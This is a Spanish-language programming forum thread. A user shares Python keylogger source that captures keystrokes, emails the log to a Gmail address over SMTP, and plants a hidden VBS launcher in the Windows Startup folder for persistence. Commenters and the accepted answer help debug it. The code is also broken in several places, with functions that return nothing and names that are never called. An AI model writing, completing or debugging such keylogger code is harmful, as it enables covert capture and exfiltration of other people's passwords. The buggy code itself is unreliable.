# ¿Es correcto lo que menciona Visual Studio o está bien mi código?

Tags: python

estoy intentando hacer un script que logre registrar exitosamente mis pulsaciones de teclas y mandarlas a mi correo (se me olvidan las contraseñas fácilmente, por eso lo hago). Sin embargo, visual studio dice que la variable "nombre" no está definida; creo que no es necesario definirla en el código. ¿Es correcto lo que menciona visual studio, si es así, como podría definir la variable en el código?

```
import datetime
from pynput.keyboard import Listener

import time

from cryptography.fernet import Fernet

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
import smtplib

import getpass, os

def enviar_email(nombre):
    def cargar_key():
        return open('pass.key', 'rb').read()

    key = cargar_key()

    clave = Fernet(key)
    pass_enc = (open('pass.enc', 'rb').read())
    password = clave.decrypt((pass_enc)).decode()

    msg = MIMEMultipart()
    mensaje = 'Mensaje aleatorio'

    msg['From'] = 'correo@gmail.com'
    msg['To'] = 'correo@gmail.com'
    msg['Subject'] = 'Aleatorio'

    msg.attach(MIMEText(mensaje, 'plain'))

    attachment = open(nombre, 'r')

    p = MIMEBase('application', 'octet-stream')
    p.set_payload((attachment).read())
    p.add_header('Content-Disposition',"attachment; filename= %s" % str(nombre))
    msg.attach(p)

    server = smtplib.SMTP('smtp.gmail.com: 587')
    server.starttls()
    server.login(msg['From'], password)
    server.sendmail(msg['From'], msg['To'], msg.as_string())
    server.quit()


def t0():
    time.time()


def d():
    datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")

def file_name():
    'keylogger_{}.txt'.format(d)


def f():

    open(file_name, 'w')

    
def key_listener():

    d 

    file_name 

    f

    t0 


def key_recorder(key):
        key = str(key)
        if key == 'Key.enter':
            f.write('\n')
        elif key == 'Key.space':
            f.write(key.replace('Key.space', ' '))
        elif key == 'Key.backspace':
            f.write(key.replace("Key.backspace", "%BORRAR%"))
        elif key == '<65027>':
            f.write('%ARROBA%')
        # elif key == "'\\x03'":
        #     f.write('\n\nSaliendo del keylogger . . .')
        #     f.close()
        #     quit()
        else:
            f.write(key.replace("'", ""))

        if time.time()-t0 > 300:
            f.close()
            enviar_email(file_name)
            quit()

with Listener(on_press=key_recorder) as listener:
    listener.join()

    
    
def mover_fichero():
    USER_NAME = getpass.getuser()
    final_path = 'C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'.format(USER_NAME)
    path_script = os.path.dirname(os.path.abspath(__file__))

    with open('open.bat', 'w+') as bat_file:
        bat_file.write('cd "{}"\n'.format(path_script))
        bat_file.write('python "keylogger.py"')

    with open(final_path+'\\'+"open.vbs", "w+") as vbs_file:
        vbs_file.write('Dim WinScriptHost\n')
        vbs_file.write('Set WinScriptHost = CreateObject("WScript.Shell")\n')
        vbs_file.write('WinScriptHost.Run Chr(34) & "{}\open.bat" & Chr(34), 0\n'.format(path_script))
        vbs_file.write('Set WinScripthost = Nothing\n')

if __name__ == '__main__':
    mover_fichero()
    key_listener()
```

Comment: dejando de lado que quieres hacer un keyloger, en que linea te da el error?

Comment: creo que encontré el error pero hay alguna norma en contra de ayudar a alguien haciendo esto? jajajaja

Comment: @AnkiJedi por lo que sé, pues nop

Comment: Jajaja pues ni que fuera a crear un ransomware jaja. Es para mi uso personal, para no olvidar mis contraseñas.

Comment: @Christian No se como, pero ya no me da el error. Ahora me está dando un error en la línea de: f.write(key.replace("'", ""))  Dice: AttributeError: 'function' object has no attribute 'write'    Ideas para arreglarlo? Creo que tengo que definir "write" o algo así, no?

Comment: @Mario1sqr141402 en ningun momento abres el archivo, por lo que no tiene un metodo `write`, lo puedes hacer con un `with open('archivo','w') as f` o `f = open('archivo','w')`

Comment: Ahhhhh ya. Gracias Christian. ¿Puedes publicar el comentario como respuesta para marcarla como la mejor? Gracias :)

Comment: @Mario1sqr141402 edita tu pregunta indicando el nuevo error que obtienes, de lo contrario me respuesta no solucionaría el error que indicas

Answer (score 2, accepted):

Bueno dado que solucionaste el problema del error y ahora tienes el del `AttributeError: 'function' object has no attribute 'write'` pues es fácil saber por que ocurre esto.

Hare una explicación sencilla de lo que significa el *scope* de una variable, esto significa el alcance que tiene una variable, desde donde puede ser usada y accedida, pero este no es el verdadero problema.
Si bien, en tu función `mover_fichero()` abres el archi, se cierra automáticamente esto gracias al `with open(...)` gracias a eso nos olvidamos de estar cerrando el archivo y controlamos el uso de memoria. Al ser cerrado Ya no tenemos acceso a sus métodos `write()`, `read()`, etc.

Ahora bien tu error se encuentra en la funcion `key_recorder()`, pues estas tratando de acceder al metodo `write()` de 1). una variable no definida y 2) un fichero no abierto. La solucion es simple, solo debemos de abrir el fichero ya sea con un `with open(...)` o con un `open(...)`

```
def key_recorder(key):
    with open('archivo','w') as f:
        f.write(..)

    #o
    #f = open('archivo','w')
    #f.write(...)
    #...
    #f.close()
```

Bueno la variable `f` solo servirá y existirá en el ámbito de la función `key_recorder()`, esto por como dije, su *scope*, si se trata de acceder a esta variable fuera de la función lanzara un error, cada vez que desees hacer una operación con tu archivo tendrás que recurrir a cualquiera de las 2 formas antes presentadas.

Comment: Esto resuelve su problema con el abrir archivo en escritura, pero hay otros problemas (bien raro que ese programa alguna vez funcionara), como por ejemplo el parametro file_name que abre en open(file_name, 'w') es una función que no devuelve nada jksjksjk

Comment: Jajaja gracias por hacérmelo notar. Que código más malo entonces jaja.